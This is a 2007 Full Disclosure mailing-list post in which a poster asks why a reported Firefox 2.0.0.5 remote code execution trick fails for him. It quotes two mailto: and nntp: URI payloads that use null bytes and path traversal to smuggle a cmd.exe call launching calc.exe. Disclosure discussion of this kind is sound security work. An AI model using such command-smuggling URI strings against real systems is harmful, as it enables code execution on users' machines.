Full Disclosure mailing list archives

FIREFOX 2.0.0.5 new vulnerability


From: "Mesut EREN" <meren () basakkiremit com tr>
Date: Wed, 25 Jul 2007 11:38:57 +0300

Hi all,

FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But
don't work is code.

Example code is 

mailto:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:%00%00../../../../../../windows/system32/cmd".exe
../../../../../../../../windows/system32/calc.exe " - " blah.bat

Where i missing?



Mesut EREN
BAŞAK ÇATI & CEPHE SİSTEMLERİ
Bilgi İşlem Sorumlusu
MCSA:S,MCSE:S,CEH,CCNA
meren () basakkiremit com tr


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread: